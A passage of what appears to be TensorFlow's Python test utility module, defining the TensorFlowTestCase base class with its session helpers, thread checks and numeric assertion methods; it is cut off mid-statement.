return decorator
# The description is just for documentation purposes.
def run_all_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute all tests in a class with TensorFloat-32 disabled."""
return for_all_test_methods(run_without_tensor_float_32, description)
def matmul_without_tf32(a, b, *args, **kwargs):
"""Run matmul but cast float32 inputs to float64 if TensorFloat-32 is enabled.
This effectively runs matmul without TensorFloat-32. It should only be used in
tests when verifying some other op or functions works correctly, e.g. to test
`tf.linalg.sqrtm` by matrix multiplying the output of the op by itself. In
such cases, the matmul itself is not being tested so it's OK to run it with
higher precision.
If a matmul itself is being tested, or some other op which uses matmul, use
`run_without_tensor_float_32` instead.
This also casts complex64 inputs to complex128, since TensorFloat-32 can also
be used with complex64
Args:
a: First input to tf.linalg.matmul
b: Second input to tf.linalg.matmul
args: Other positional arguments to tf.linalg.matmul
**kwargs: Other keyword arguments to tf.linalg.matmul
Returns:
A tensor with the same type as `a`.
"""
if config.tensor_float_32_execution_enabled() and a.dtype == "float32":
a = math_ops.cast(a, "float64")
b = math_ops.cast(b, "float64")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
elif config.tensor_float_32_execution_enabled() and a.dtype == "complex64":
a = math_ops.cast(a, "complex128")
b = math_ops.cast(b, "complex128")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
else:
return math_ops.matmul(a, b, *args, **kwargs)
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tf_session.TF_SetXlaAutoJitMode("2")
pywrap_tf_session.TF_SetXlaMinClusterSize(1)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
# Check if the mlir bridge has been explicitly enabled or disabled. If
# is_mlir_bridge_enabled() returns None, the user did not explictly enable
# or disable the bridge so do not update enable_mlir_bridge.
if is_mlir_bridge_enabled():
context.context().enable_mlir_bridge = True
elif is_mlir_bridge_enabled() is not None:
context.context().enable_mlir_bridge = False
self._threads = []
self._tempdir = None
self._cached_session = None
self._test_start_time = None
# This flag provides the ability to control whether the graph mode gets
# initialized for TF1 or not. Initializing for TF1, which is what was
# happening earlier, was preventing enablement of 'eager mode' in the test.
self._set_default_seed = True
def setUp(self):
super(TensorFlowTestCase, self).setUp()
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
if self._set_default_seed:
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
self._test_start_time = time.time()
def tearDown(self):
# If a subclass overrides setUp and doesn't call the parent class's setUp,
# then we may not have set the start time.
if self._test_start_time is not None:
logging.info("time(%s): %ss", self.id(),
round(time.time() - self._test_start_time, 2))
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
super(TensorFlowTestCase, self).tearDown()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, (str, bytes)):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s." %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
# Convert tensors and composite tensors to numpy arrays.
return nest.map_structure(lambda t: t.numpy(), tensor,
expand_composites=True)
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""A context manager for a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest(
"Tests that have the name \"test_session\" are automatically skipped "
"by TensorFlow test fixture, as the name is reserved for creating "
"sessions within tests. Please rename your test if you have a test "
"with this name.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tensor(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
# np.allclose does not always work for our custom bfloat16 extension type
# when type promotions are involved, so we first cast any bfloat16 arrays
# to float32.
a_dtype = a.dtype
a = a.astype(np.float32) if a.dtype == dtypes.bfloat16.as_numpy_dtype else a
b = b.astype(np.float32) if b.dtype == dtypes.bfloat16.as_numpy_dtype else b
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a_dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Note: the implementation follows
[`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
(and numpy.testing.assert_allclose). It checks whether two arrays are
element-wise equal within a tolerance. The relative difference
(`rtol * abs(b)`) and the absolute difference `atol` are added together
to compare against the absolute difference between `a` and `b`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
except AssertionError:
return
msg = msg or ""
raise AssertionError("The two values are close at all elements. %s" % msg)
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %r. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = %r" % x)
msgs.append("not equal rhs = %r" % y)
# Handle mixed string types as a result of PY2to3 migration. That is, the
# mixing between bytes (b-prefix strings, PY2 default) and unicodes
# (u-prefix strings, PY3 default).
if six.PY3:
if (a.dtype.kind != b.dtype.kind and
{a.dtype.kind, b.dtype.kind}.issubset({"U", "S", "O"})):
a_list = []
b_list = []
# OK to flatten `a` and `b` because they are guaranteed to have the
# same shape.
for out_list, flat_arr in [(a_list, a.flat), (b_list, b.flat)]:
for item in flat_arr:
if isinstance(item, str):
out_list.append(item.encode("utf-8"))
else:
out_list.append(item)
a = np.array(a_list)
b = np.array(b_list)
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
if np.ndim(value) == 0:
return [prefix + "[0] : " + str(value)]
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
